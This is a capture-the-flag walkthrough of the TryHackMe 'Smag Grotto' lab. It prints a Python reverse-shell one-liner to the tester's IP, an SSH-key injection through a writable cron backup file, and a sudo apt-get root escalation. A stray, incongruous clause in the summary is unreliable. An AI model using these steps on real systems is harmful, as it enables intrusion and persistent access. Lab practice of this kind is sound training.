In this walk through, we will be going through the Smag Grotto room from Tryhackme. This room is rated as Easy on the platform and consist Enumeration, Wireshark pcap analysis, Cron job abuse and Privilege escalation. So, let’s get started without any delay.
Table of Contents
|Objective||Deploy the machine and get root privileges.|
- I started with a regular nmap scan with service version detection and found two ports opened – 80 (HTTP) and 22 (SSH).
sudo nmap -sS -sV 10.10.71.178
- Next, fired up gobuster on the web server running on port 80 and found a directory named – /mail.
wh1terose@fsociety:~$ gobuster dir -u http://10.10.71.178/ -w ~/Desktop/Wordlist/common.txt =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.71.178/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /home/wh1terose/Desktop/Wordlist/common.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2023/11/18 22:59:35 Starting gobuster in directory enumeration mode =============================================================== /.hta (Status: 403) [Size: 277] /.htpasswd (Status: 403) [Size: 277] /.htaccess (Status: 403) [Size: 277] /index.php (Status: 200) [Size: 402] /mail (Status: 301) [Size: 311] [--> http://10.10.71.178/mail/] /server-status (Status: 403) [Size: 277] =============================================================== 2023/11/18 23:01:19 Finished ===============================================================
- The directory consist a copy of the emails sent among the server’s admin and consist of a pcap file for analysis. There is a note in the last email, where we have been instructed to download the pcap file via wget.
- Used wget to download the file on my local machine for further inspection.
- Loaded the pcap file in Wireshark and followed the HTTP data stream in it. Found a username and password combo in a login request to an internal server named development.smag.thm.
- In order to access the development server where the login request was issued as per the HTTP steam. We have to add it our /etc/hosts file.
- Once done with the configuration in /etc/hosts, we are able to access the server. The server contains a login panel link which we can access with our found credentials.
- Once logged in, we are presented with a shell interface where we can commands. A tried a variety of commands but was unable to see any result in the frontend. Next, i also tried to login to the server via SSH with our found credentials but got no luck.
- I then tried to get a reverse shell with the below payload and luckily this time got a connection back to our netcat listener.
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.18.1.78",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
- Next, in order to access the user flag we have to escalate our privileges to be user jake. So, fired up linpeas on the machine and an interesting cron job got my attention where the copy of jake’s SSH public key is being backed up and a cron job is set to copy the contents of the backup file to jake’s authorized keys in his .ssh directory.
- I checked the permissions for the backup file and found that we can read and write changes to the file. BIngo!
- That means, we can add our public key to the backup file and once the cron job will run, we can access the server via SSH with our private key as jake. So, i generated a pair of SSH keys on my local machine using ssh-keygen.
- Next, i copied it to the jake_id_rsa.pub.backup file.
echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDXafOG9d6uI0bGBY6+4pwaOaKglkfJgbA/PAAazPaz+28HxC1rOxzc8aykUGKKta7qk3Umqs9S/WtzikPwB88fOAGj05LxtTE2Xl8xWNU9mhwJ1xuQFqJJBeT0ia1/0NRiYPao15QkgWjROsTWfgD2YL0jawwkkLzG5idQ+OevEAoSt2RYcG3oFm1kvtZZuM3oNYlFYehbkF495nkC0iRITECxSyvliOsRPTlndfGS4IGEiAMcUW9kqQMKRCpCw8az1IkYln3jMTZNUopx2uE0dIbXQO88YcMWyEhF9LWMECJDkxHUHaa2YCuxxeCiYpF9RK/P8I3cYP+f/Ws5FVu285TD3BoLMnup3yoY1hbs0Z9t2JEaDaPRl3JcjuMC/YSeLhiIqETDCAxLwMC0j/9KoslVBQ+NCIGwFfIQE56cbwS2xXMFpEE0Xj3nhxpq3n+L8YS2WMUS5BcC99i1b/cYl+Kmbll5u6uTaDmlDNSJTlk3AOM1tkvq9wAfwjkAD7s= wh1terose@fsociety' > jake_id_rsa.pub.backup
- Logged in successfully as user jake with our generated private key and got the user flag.
- Next, checked the sudo permissions for user jake and found that he can run apt-get binary without any password as root.
- Used GTFObins to exploit the binary and got the root flag.
sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh
Task 1 – Smag Grotto
Question 1 – What is the user flag?
Question 2 – What is the root flag?
Also Read: Tryhackme – Retro
So that was “Smag Grotto” for you. We first started with our regular nmap scan and found two ports opened – 80 (HTTP) and 22 (SSH). Next, we fired gobuster on the web server running and found a directory named /mail which has copies of emails that was exchanged between the server’s machine where we found a pcap file. Downloaded the pcap using wget and loaded it in wireshark for further inspection. Found a username and password in a HTTP stream. Used it to login into a development server on development.smag.thm and used the command shell functionality to get a reverse shell connection back to our netcat listener. Next, abused a cron job by adding our generated SSH public key to jake’s .SSH directory and got access as jake using our private key. At last, exploited the sudo permissions for apt-get to get the root flag and the permission to cheat on my dead wife. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.